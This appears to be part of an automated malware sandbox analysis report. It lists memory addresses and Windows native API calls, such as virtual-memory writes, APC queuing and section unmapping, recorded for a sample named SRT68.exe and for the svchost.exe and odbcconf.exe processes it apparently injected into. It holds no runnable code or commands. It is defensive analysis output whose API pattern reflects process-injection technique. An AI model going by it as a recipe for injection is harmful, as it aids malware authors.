                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BA0 NtEnumerateValueKey,2_2_03772BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772B80 NtQueryInformationFile,2_2_03772B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AF0 NtWriteFile,2_2_03772AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AD0 NtReadFile,2_2_03772AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AB0 NtWaitForSingleObject,2_2_03772AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F60 NtCreateProcessEx,2_2_03772F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F30 NtCreateSection,2_2_03772F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FE0 NtCreateFile,2_2_03772FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FB0 NtResumeThread,2_2_03772FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FA0 NtQuerySection,2_2_03772FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F90 NtProtectVirtualMemory,2_2_03772F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772E30 NtWriteVirtualMemory,2_2_03772E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772EE0 NtQueueApcThread,2_2_03772EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772EA0 NtAdjustPrivilegesToken,2_2_03772EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772E80 NtReadVirtualMemory,2_2_03772E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D30 NtUnmapViewOfSection,2_2_03772D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D10 NtMapViewOfSection,2_2_03772D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D00 NtSetInformationFile,2_2_03772D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DD0 NtDelayExecution,2_2_03772DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DB0 NtEnumerateKey,2_2_03772DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C60 NtCreateKey,2_2_03772C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C00 NtQueryInformationProcess,2_2_03772C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CF0 NtOpenProcess,2_2_03772CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CC0 NtQueryVirtualMemory,2_2_03772CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CA0 NtQueryInformationToken,2_2_03772CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773010 NtOpenDirectoryObject,2_2_03773010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773090 NtSetValueKey,2_2_03773090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037739B0 NtGetContextThread,2_2_037739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773D70 NtOpenThread,2_2_03773D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773D10 NtOpenProcessToken,2_2_03773D10
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E84650 NtSuspendThread,LdrInitializeThunk,4_2_04E84650
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E84340 NtSetContextThread,LdrInitializeThunk,4_2_04E84340
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_04E82CA0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82C60 NtCreateKey,LdrInitializeThunk,4_2_04E82C60
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_04E82C70
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_04E82DF0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82DD0 NtDelayExecution,LdrInitializeThunk,4_2_04E82DD0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_04E82D30
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82D10 NtMapViewOfSection,LdrInitializeThunk,4_2_04E82D10
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82EE0 NtQueueApcThread,LdrInitializeThunk,4_2_04E82EE0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_04E82E80
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82FE0 NtCreateFile,LdrInitializeThunk,4_2_04E82FE0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82FB0 NtResumeThread,LdrInitializeThunk,4_2_04E82FB0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82F30 NtCreateSection,LdrInitializeThunk,4_2_04E82F30
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82AF0 NtWriteFile,LdrInitializeThunk,4_2_04E82AF0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82AD0 NtReadFile,LdrInitializeThunk,4_2_04E82AD0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82BE0 NtQueryValueKey,LdrInitializeThunk,4_2_04E82BE0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_04E82BF0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_04E82BA0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82B60 NtClose,LdrInitializeThunk,4_2_04E82B60
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E835C0 NtCreateMutant,LdrInitializeThunk,4_2_04E835C0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E839B0 NtGetContextThread,LdrInitializeThunk,4_2_04E839B0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82CF0 NtOpenProcess,4_2_04E82CF0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82CC0 NtQueryVirtualMemory,4_2_04E82CC0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82C00 NtQueryInformationProcess,4_2_04E82C00
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82DB0 NtEnumerateKey,4_2_04E82DB0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82D00 NtSetInformationFile,4_2_04E82D00
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82EA0 NtAdjustPrivilegesToken,4_2_04E82EA0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82E30 NtWriteVirtualMemory,4_2_04E82E30
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82FA0 NtQuerySection,4_2_04E82FA0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82F90 NtProtectVirtualMemory,4_2_04E82F90
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82F60 NtCreateProcessEx,4_2_04E82F60
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82AB0 NtWaitForSingleObject,4_2_04E82AB0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E82B80 NtQueryInformationFile,4_2_04E82B80
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E83090 NtSetValueKey,4_2_04E83090
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E83010 NtOpenDirectoryObject,4_2_04E83010
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E83D70 NtOpenThread,4_2_04E83D70
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E83D10 NtOpenProcessToken,4_2_04E83D10
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EF9220 NtCreateFile,4_2_02EF9220
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EF9380 NtReadFile,4_2_02EF9380
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EF9670 NtAllocateVirtualMemory,4_2_02EF9670
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EF9470 NtDeleteFile,4_2_02EF9470
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EF9510 NtClose,4_2_02EF9510
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_0100A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0100A1EF
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FF8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00FF8310
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_010051BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_010051BD
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FCD9750_2_00FCD975
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FC21C50_2_00FC21C5
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FD62D20_2_00FD62D2
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_010203DA0_2_010203DA
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FD242E0_2_00FD242E
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FC25FA0_2_00FC25FA
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FB66E10_2_00FB66E1
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FAE6A00_2_00FAE6A0
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FFE6160_2_00FFE616
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FD878F0_2_00FD878F
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FD68440_2_00FD6844
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FB88080_2_00FB8808
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_010208570_2_01020857
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_010088890_2_01008889
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FCCB210_2_00FCCB21
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FD6DB60_2_00FD6DB6
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FB6F9E0_2_00FB6F9E
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FB30300_2_00FB3030
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FCF1D90_2_00FCF1D9
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FC31870_2_00FC3187
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FA12870_2_00FA1287
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FC14840_2_00FC1484
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FB55200_2_00FB5520
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FC76960_2_00FC7696
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FB57600_2_00FB5760
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FC19780_2_00FC1978
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FD9AB50_2_00FD9AB5
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FAFCE00_2_00FAFCE0
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_01027DDB0_2_01027DDB
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FCBDA60_2_00FCBDA6
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FC1D900_2_00FC1D90
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FB3FE00_2_00FB3FE0
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FADF000_2_00FADF00
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_015B1DC80_2_015B1DC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004185432_2_00418543
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010C02_2_004010C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010BE2_2_004010BE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1092_2_0040E109
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1132_2_0040E113
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012102_2_00401210
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EBB32_2_0042EBB3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FDB32_2_0040FDB3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402E002_2_00402E00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026102_2_00402610
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041674F2_2_0041674F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004167532_2_00416753
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DFC32_2_0040DFC3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FFD32_2_0040FFD3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA3522_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038003E62_2_038003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F02_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E02742_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C02C02_2_037C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C81582_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038001AA2_2_038001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA1182_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037301002_2_03730100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F81CC2_2_037F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F41A22_2_037F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D20002_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037407702_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037647502_2_03764750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373C7C02_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375C6E02_2_0375C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038005912_2_03800591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037405352_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F24462_2_037F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E44202_2_037E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EE4F62_2_037EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FAB402_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F6BD72_2_037F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA802_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037569622_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380A9A62_2_0380A9A6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0374A840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03742840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0376E8F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037268B8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B4F40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03760F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037E2F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03782F28
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0374CFE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03732FC8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037BEFA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03740E59
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FEE26
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FEEDB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03752E90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FCE93
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DCD1F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0374AD00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0373ADE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03758DBF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03740C00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03730CF2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037E0CB5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372D34C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F132D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0378739A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037E12ED
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0375B2C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037452A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372F172
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0377516C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0374B1B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0380B16B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F70E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FF0E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037EF0CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037470C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FF7B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03785630
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F16CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F7571
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038095C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DD5B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03731460
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FF43F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FFB76
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B5BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0377DBF9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0375FB80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B3A6C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FFA49
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F7A46
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037EDAC6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DDAAC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03785AA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037E1AA3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03749950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0375B950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037D5910
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037AD800
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037438E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FFF09
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03703FD2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03703FD5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FFFB1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03741F92
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03749EB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F7D73
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F1D5A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03743D40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0375FDC0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B9C32
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FFCF2
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04EFE4F6
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04F02446
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04EF4420
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04F10591
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E50535
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E6C6E0
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E4C7C0
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E50770
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E74750
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04EE2000
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04F081CC
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04F041A2
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04F101AA
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04ED8158
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E40100
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04EEA118
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04ED02C0
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04EF0274
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E5E3F0
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04F103E6
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04F0A352
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E40CF2
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04EF0CB5
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E50C00
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E4ADE0
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E68DBF
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E5AD00
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04EECD1F
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04F0EEDB
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04F0CE93
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E62E90
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E50E59
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04F0EE26
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E5CFE0
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E42FC8
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04ECEFA0
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04EC4F40
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E92F28
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E70F30
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04EF2F30
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E7E8F0
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E368B8
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E52840
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E5A840
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E529A0
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04F1A9A6
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E66962
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E4EA80
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04F06BD7
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04F0AB40
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E41460
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04F0F43F
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04F195C3
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04EED5B0
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04F07571
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04F016CC
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E95630
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04F0F7B0
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04F0F0E0
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04F070E9
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04EFF0CC
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E570C0
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E5B1B0
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E8516C
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E3F172
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04F1B16B
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04EF12ED
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E6B2C0
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E552A0
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E9739A
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E3D34C
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04F0132D
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04F0FCF2
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04EC9C32
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E6FDC0
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04F07D73
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E53D40
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04F01D5A
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E59EB0
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04F0FFB1
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E51F92
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04F0FF09
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E538E0
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04EBD800
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E59950
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E6B950
